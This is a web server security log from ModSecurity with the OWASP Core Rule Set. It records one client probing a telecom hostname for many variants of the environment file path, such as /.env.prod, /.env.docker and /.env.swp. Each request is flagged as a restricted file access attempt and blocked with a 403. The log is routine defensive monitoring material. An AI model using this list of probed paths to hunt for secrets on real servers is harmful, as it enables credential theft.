[Mon May 11 17:22:39.015359 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agH0P0WKUxpmnkK7zHySHwAAAQs"]
[Mon May 11 17:22:39.015855 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agH0P0WKUxpmnkK7zHySHwAAAQs"]
[Mon May 11 17:22:39.016151 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agH0P0WKUxpmnkK7zHySHwAAAQs"]
[Mon May 11 17:22:39.178329 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agH0P0WKUxpmnkK7zHySIAAAAQs"]
[Mon May 11 17:22:39.179036 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agH0P0WKUxpmnkK7zHySIAAAAQs"]
[Mon May 11 17:22:39.179378 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agH0P0WKUxpmnkK7zHySIAAAAQs"]
[Mon May 11 17:22:39.340949 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agH0P0WKUxpmnkK7zHySIQAAAQs"]
[Mon May 11 17:22:39.341466 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agH0P0WKUxpmnkK7zHySIQAAAQs"]
[Mon May 11 17:22:39.341717 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agH0P0WKUxpmnkK7zHySIQAAAQs"]
[Mon May 11 17:22:39.503066 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.stage"] [unique_id "agH0P0WKUxpmnkK7zHySIgAAAQs"]
[Mon May 11 17:22:39.503595 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.stage"] [unique_id "agH0P0WKUxpmnkK7zHySIgAAAQs"]
[Mon May 11 17:22:39.503831 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.stage"] [unique_id "agH0P0WKUxpmnkK7zHySIgAAAQs"]
[Mon May 11 17:22:39.666751 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.ci"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.ci"] [unique_id "agH0P0WKUxpmnkK7zHySIwAAAQs"]
[Mon May 11 17:22:39.667245 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.ci"] [unique_id "agH0P0WKUxpmnkK7zHySIwAAAQs"]
[Mon May 11 17:22:39.667466 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.ci"] [unique_id "agH0P0WKUxpmnkK7zHySIwAAAQs"]
[Mon May 11 17:22:39.831585 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agH0P0WKUxpmnkK7zHySJAAAAQs"]
[Mon May 11 17:22:39.832064 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agH0P0WKUxpmnkK7zHySJAAAAQs"]
[Mon May 11 17:22:39.832323 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agH0P0WKUxpmnkK7zHySJAAAAQs"]
[Mon May 11 17:22:39.994049 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agH0P0WKUxpmnkK7zHySJQAAAQs"]
[Mon May 11 17:22:39.994553 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agH0P0WKUxpmnkK7zHySJQAAAQs"]
[Mon May 11 17:22:39.994795 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agH0P0WKUxpmnkK7zHySJQAAAQs"]
[Mon May 11 17:22:40.157416 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.preprod"] [unique_id "agH0QEWKUxpmnkK7zHySJgAAAQs"]
[Mon May 11 17:22:40.157905 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.preprod"] [unique_id "agH0QEWKUxpmnkK7zHySJgAAAQs"]
[Mon May 11 17:22:40.158144 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.preprod"] [unique_id "agH0QEWKUxpmnkK7zHySJgAAAQs"]
[Mon May 11 17:22:40.319986 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.uat"] [unique_id "agH0QEWKUxpmnkK7zHySJwAAAQs"]
[Mon May 11 17:22:40.320508 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.uat"] [unique_id "agH0QEWKUxpmnkK7zHySJwAAAQs"]
[Mon May 11 17:22:40.320760 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.uat"] [unique_id "agH0QEWKUxpmnkK7zHySJwAAAQs"]
[Mon May 11 17:22:40.499274 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agH0QEWKUxpmnkK7zHySKAAAAQs"]
[Mon May 11 17:22:40.499785 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agH0QEWKUxpmnkK7zHySKAAAAQs"]
[Mon May 11 17:22:40.500041 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agH0QEWKUxpmnkK7zHySKAAAAQs"]
[Mon May 11 17:22:40.665378 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agH0QEWKUxpmnkK7zHySKQAAAQs"]
[Mon May 11 17:22:40.665864 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agH0QEWKUxpmnkK7zHySKQAAAQs"]
[Mon May 11 17:22:40.666114 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agH0QEWKUxpmnkK7zHySKQAAAQs"]
[Mon May 11 17:22:40.832115 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agH0QEWKUxpmnkK7zHySKwAAAQs"]
[Mon May 11 17:22:40.832657 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agH0QEWKUxpmnkK7zHySKwAAAQs"]
[Mon May 11 17:22:40.832905 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agH0QEWKUxpmnkK7zHySKwAAAQs"]
[Mon May 11 17:22:40.996428 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env1"] [unique_id "agH0QEWKUxpmnkK7zHySLAAAAQs"]
[Mon May 11 17:22:40.997151 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env1"] [unique_id "agH0QEWKUxpmnkK7zHySLAAAAQs"]
[Mon May 11 17:22:40.997532 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env1"] [unique_id "agH0QEWKUxpmnkK7zHySLAAAAQs"]
